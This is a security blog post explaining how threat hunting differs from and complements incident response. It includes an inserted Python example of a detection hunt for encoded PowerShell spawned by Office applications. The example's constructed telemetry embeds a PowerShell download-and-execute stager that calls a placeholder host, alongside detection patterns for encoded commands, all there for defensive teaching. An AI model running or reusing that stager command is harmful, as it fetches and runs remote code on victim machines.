Threat Hunting vs Incident Response: Getting Proactive Instead of Staying Reactive

Over the past few years, threat hunting has grown from an isolated practice into a mainstream, industry-accepted discipline. Despite the rise in conference talks, vendor pitches for threat hunting products and services, and excellent open source tools, many organizations still haven’t reaped the rewards of threat hunting. The SANS Institute released its 2018 Threat Hunting Survey results last month, reporting that 43.2% of organizations hunt continuously, 16.7% hunt on a regular schedule, 37.3% hunt in response to some event trigger, and 2.8% weren’t sure or didn’t know [1]. While 59.9% of the 600 surveyed organizations reported an active threat hunting program, many organizations I encounter in the field still ask a lot of fundamental questions about what threat hunting is and why the investment in threat hunting is worth it.

Today we will explore the difference between threat hunting and your (hopefully existing) incident response plan. We will also look at how active threat hunting complements incident response.

Threat Hunting Defined

According to the SANS Institute definition, threat hunting is “a focused and iterative approach to searching out, identifying, and understanding adversaries who have entered the defender’s network” [1]. This definition sounds good, but how does it add value to your existing program? When I started at the Air Force Computer Emergency Response Team (AFCERT), one of the things we learned in training was that defensive actions break into the following three categories: prevention, detection, and response.


First, you can invest in prevention. Technologies like antivirus, next-generation firewalls, and all the other shiny boxes vendors sell can help stop an attack from happening in the first place. Even with a nearly unlimited budget, your prevention efforts will eventually fail. When prevention fails, you move into detection. Detection refers to the efforts and technologies for uncovering attackers who are already in your network, and it is a cat and mouse game with those attackers. Once an attacker has been discovered, response covers the efforts involved in containing the attacker and removing them from your environment. A comprehensive threat hunting program supports both prevention and detection, while incident response mainly deals with the response phase.

Threat Hunting for Detection and Prevention

To dig deeper into gaining the full benefits of threat hunting, let’s look at The Sliding Scale of Cyber Security [2], which breaks defensive investment into five categories: Architecture, Passive Defense, Active Defense, Intelligence, and Offense.


Incident response falls into the Active Defense category. An organization might enter an incident response scenario because a source in the Intelligence category reports an intrusion, or because a Passive Defense product generates an alert. Either way, incident response occurs after the discovery of an intrusion. An incident response scenario might lead an organization to invest additional resources in one of the five sliding scale categories; however, that investment comes after the intrusion has already happened.

Threat hunting also falls into the Active Defense category. However, effective threat hunting informs an organization’s need for additional security before an event occurs. As an example, threat intelligence might drive an organization to proactively look for an attacker’s tactics, techniques, and procedures. If, while hunting for a tool reported by a threat intelligence source, an organization discovers and closes an Architecture or Passive Defense gap before an attacker exploits it, the hunt has strengthened prevention. Likewise, if an organization discovers a previously undetected attacker thanks to knowledge of a new attacker tactic, the hunt has acted as a detection source.
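The paragraph above describes the two outcomes of an intelligence-driven hunt in the abstract. The following example is added here to make that concrete; it is not code from the original post. It assumes a hypothetical intelligence report saying a tracked actor launches an encoded PowerShell command from a Microsoft Office parent process, turns that TTP into a query over constructed process-creation events, and sorts the findings into the two buckets the post names: a full match is a lead for incident response, while a partial match (Office spawning a shell with no encoded payload) is a Passive Defense gap worth closing before an attacker uses it. The telemetry, host names and command lines are all constructed for the example.

```python
"""Hypothesis-driven hunt over constructed endpoint process telemetry.

Hypothetical scenario (an assumption of this example, not from the post):
a threat intelligence report says a tracked actor launches an encoded
PowerShell command from a Microsoft Office parent process. The hunt turns
that reported TTP into a query and sorts what it finds into two outcomes:
a full match is a lead for incident response, and a partial match (Office
spawning a shell without an encoded payload) is a passive-defense gap.
"""
import base64
import re
from dataclasses import dataclass

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}

# Common spellings of PowerShell's -EncodedCommand switch followed by base64.
ENC_SWITCH = re.compile(
    r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


@dataclass
class ProcessEvent:
    host: str
    parent_image: str
    image: str
    command_line: str


@dataclass
class HuntResult:
    hits: list   # (event, decoded command) pairs matching the hypothesis
    gaps: list   # Office -> shell with no encoded payload: hardening gap


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def _enc(script: str) -> str:
    """Encode a script the way PowerShell expects for -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed sample telemetry (not real logs): host|parent|image|command_line
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = "\n".join([
    f"WS01|C:\\Program Files\\Microsoft Office\\WINWORD.EXE|{PS}|powershell.exe -nop -w hidden -enc {_enc(STAGER)}",
    f"WS02|C:\\Windows\\explorer.exe|{PS}|powershell.exe -File C:\\scripts\\inventory.ps1",
    "WS03|C:\\Program Files\\Microsoft Office\\EXCEL.EXE|C:\\Windows\\System32\\cmd.exe|cmd.exe /c whoami",
    "SRV01|C:\\Windows\\System32\\services.exe|C:\\Windows\\System32\\svchost.exe|svchost.exe -k netsvcs",
    f"WS04|C:\\Program Files\\Microsoft Office\\OUTLOOK.EXE|{PS}|powershell.exe -EncodedCommand {_enc(STAGER)}",
])


def parse_events(text: str) -> list:
    events = []
    for line in text.strip().splitlines():
        host, parent, image, cmdline = line.split("|", 3)
        events.append(ProcessEvent(host, parent, image, cmdline))
    return events


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if absent/invalid."""
    m = ENC_SWITCH.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def hunt_office_spawned_encoded_powershell(events) -> HuntResult:
    """Apply the intel-derived hypothesis to every process-creation event."""
    result = HuntResult(hits=[], gaps=[])
    for ev in events:
        parent, image = _basename(ev.parent_image), _basename(ev.image)
        if parent not in OFFICE_PARENTS or image not in SHELLS:
            continue
        decoded = decode_encoded_command(ev.command_line)
        if decoded is not None:
            result.hits.append((ev, decoded))   # lead for incident response
        else:
            result.gaps.append(ev)              # passive-defense gap to close
    return result


def scope_by_indicator(hits) -> dict:
    """Expand confirmed hits into incident scope: which hosts ran the same payload?"""
    scope = {}
    for ev, decoded in hits:
        scope.setdefault(decoded, []).append(ev.host)
    return {k: sorted(v) for k, v in scope.items()}


if __name__ == "__main__":
    res = hunt_office_spawned_encoded_powershell(parse_events(SAMPLE_EVENTS))
    for ev, decoded in res.hits:
        print(f"HIT  {ev.host}: {decoded}")
    for ev in res.gaps:
        print(f"GAP  {ev.host}: {_basename(ev.parent_image)} -> {ev.command_line}")
    print("scope:", scope_by_indicator(res.hits))
```

Run against the constructed events, the hunt reports WS01 and WS04 as hits sharing the same decoded stager (which is exactly the scoping information an incident response team needs), and WS03 as a gap: Excel spawning cmd.exe may be a benign macro, but a passive defense that blocks Office from spawning shells would close the path before the reported actor uses it. That second finding is the prevention value of the hunt; the first is its detection value.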

Parting Thoughts

A well-designed threat hunting program shows you where resources should be allocated to keep attackers out, or to detect them sooner when they get in. Incident response, by comparison, deals with triaging and responding to a security event that is already underway in the environment.

To keep your threat hunting proactive, you should look for the following things:

  1. Do your threat hunts drive architecture changes when a hunt uncovers a structural weakness in your architecture?
  2. Are your threat hunts proactive or reactive?
  3. Do your threat hunts look for things beyond what your existing passive defense measures might see?
  4. When incidents do happen, do you expand the scope of your threat hunts to try to prevent the attack in the future or find the incident sooner?

Stay tuned next week as we further dive into how to ensure your threat hunt program both prevents and detects attackers.




Header photo by Jilbert Ebrahimi on Unsplash